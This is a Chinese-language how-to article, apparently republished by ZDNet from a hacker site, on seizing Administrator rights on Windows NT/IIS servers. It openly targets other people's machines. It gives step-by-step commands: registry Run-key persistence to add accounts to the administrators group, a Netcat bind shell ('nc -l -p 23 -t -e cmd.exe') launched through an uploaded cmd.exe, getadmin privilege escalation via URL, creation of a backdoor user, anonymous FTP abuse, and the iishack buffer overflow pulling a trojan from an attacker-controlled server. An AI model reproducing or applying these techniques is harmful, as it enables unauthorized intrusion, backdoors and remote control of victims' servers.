教你获取WindowsNT的Admin权限的方法

ZDNet软件频道　时间：2009-11-05　作者：EternalDream　 | 黑客基地　　我要评论()
本文关键词：系统安全 Admin权限 Windows 2000 Windows

想完全控制别人硬盘上的文件么？首先要先获取别人系统的管理员权限，怎样来做？看完文章你会有所了解。

　　凡是具有登录NT本机的用户，例如IUSR_machine，都具有对 HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWindowsCurrentVersionRun 项的可读可写权限，该用户可以远程访问这个项。比如，他可以创建一个bat文件，文件内容为：cmd.exe /c net localgroup administrators IUSR_machine /add，把该文件copy到winnt目录下，然后在注册表上述的项添加一个数值，指向这个文件。

　　那么，当下次Admin登录到该机器上时，就会自动把IUSR_machine添加到Administrators组。

　　另，注册表键HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersCommon Startup 也可以这么做。

　　二、自建Telnet服务在NT上执行指令

　　要求用户有文件上传权限，而且该目录位于web目录下，该目录允许执行，下面是具体步骤。

　　假设你的目录是www.xxx.com/frankie，那么，把cmd.exe(位于C:winntsystem32cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去。

　　然后，在浏览器端输入：

　　http://www.xxx.com/frankie/cmd.e ... 20-t%20-e%20cmd.exe

　　这时候，你的浏览器将停止不动，实际上，Server上的Telnet的服务已经产生了。

　　这时，用Telnet连接www.xxx.com的23端口。你发现，不用密码，不用登陆，对方C:提示符已经出现在你的眼前！更妙的是，这个Telnet server是一个一次性的服务，当客户端一退出，该服务也将终止。

　　Netcat不同于一般的特洛伊木马，它可以构建任何的TCP连接服务。在浏览器端输入上述的字符串，等价于在NT的Dos方式下输入

　　nc -l -p 23 -t -e cmd.exe

　　这将把cmd.exe绑定到23端口上。

　　三、入侵NTserver典型途径V2.0

　　1、如果你有NT/IIS服务器的任何一个帐号，哪怕是guest帐号，都可以获得root。

　　2、用Netcat和iishack可以获得root。

　　3、Iusr_计算机名这个帐号有ftp上传，web执行等权限。

　　4、在Web server上执行程序是入侵NT的关键。

　　5、要在Web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。

　　在本文中，目标机器的名称是ntsvr2，目标机器的域名是www.xxx.com，目标机器上有scripts和cgi-bin目录，scripts目录下有uploadn.asp等asp程序，可能有guest帐号，肯定有iusr_ntsvr2这个帐号。

　　第一个方法、用Iusr_ntsvr2后者Guest这两个帐号

　　这里假设我们已经破解了这个帐号的密码，在浏览器输入：

　　http://www.xxx.com/scripts/uploadn.asp

　　guest和iusr_ntsvr2这两个帐号都可以进这个asp页面，在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录。

　　然后输入：

　　http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

　　大约十多秒后屏幕显示：

　　CGI Error

　　这时有90%的可能是：你已经把IUSR_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。

　　下面可以Add user：

　　http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32 et.exe%20user%20china%20news%20/add

　　这样就创建了一个叫china用户，密码是news，然后：

　　http://www.xxx.com/scripts/getadmin.exe?china

　　第二个方法、用匿名Ftp

　　如果允许匿名帐号ftp登陆的设定，也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server，比如:www.xxx.com(示例名)：

　　ftp www.xxx.com

　　Connected to www.xxx.com

　　220 ntsvr2 Microsoft FTP Service (Version 3.0).

　　Ntsvr2这个东西暴露了其NETbios名，那么在IIS的背景下，必然会有一个IUSR_ntsvr2的用户帐号，属于Domain user组，这个帐号我们以后要用来获取Administrator的权限。

　　User (www.xxx.com:(none)):anonymous

　　331 Anonymous access allowed， send identity (e-mail name) as password.

　　Password：输入 guest@ 或者guest。

　　对于缺乏网络安全知识的管理员来说，很多人没有将guest帐号禁止，或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组。在这种情况下我们就可以进NT server的ftp了。

　　进去以后，看看目录列表，试试 cd /scripts 或cgi-bin等关键目录，如果运气好，改变目录成功，这时你就有了80%的把握。

　　把Winnt下的cmd.execopy到cgi-bin，把getadmin和gasys.dll传上去到cgi-bin，然后输入：

　　http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

　　大约十多秒后屏幕显示：

　　CGI Error

　　这时有90%的可能是：你已经把IUSR_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。

　　下面可以add user：

　　http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32 et.exe%20user%20china%20news%20/add

　　这样就创建了一个叫china用户，密码是news，然后：

　　http://www.xxx.com/cgi-bin/getadmin.exe?china

　　或者

　　http://www.xxx.com/scripts/tools/getadmin.exe?china

　　你再用China的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。

　　第三个方法、用netcat和iishack

　　如果你熟悉使用Netcat这个工具，你就知道，netcat可以利用NT的弱点在其上绑定端口，下面用eEye的工具已经介绍过，如果你熟悉Netcat，成功的可能性会更大。

　　IIS的ISAPI的毛病(*.HTR) 我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下，有个DLL文件叫ism.dll，这个模块在web运行的时候就被加载到较高的内存地址，并且导致了零字节问题到处出现IIShack.asm，利用这个毛病，eEye写了两个程序：

　　iishack.exe

　　ncx99.exe

　　为达目的你必须自己有一个web server，把ncx99.exe和netbus木马传到这个web server的目录下，比如你的web server是：

　　www.mysvr.com? 而对方的IIS server是www.xxx.com

　　则：

　　iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意，不要加http://字符!)

　　上述命令输入后这时你应该可以看到

　　------(IIS 4.0 remote buffer overflow exploit)-----------------

　　http://www.eEye.com

　　[usage: iishack ]

　　eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe

　　do not include "http://" before hosts!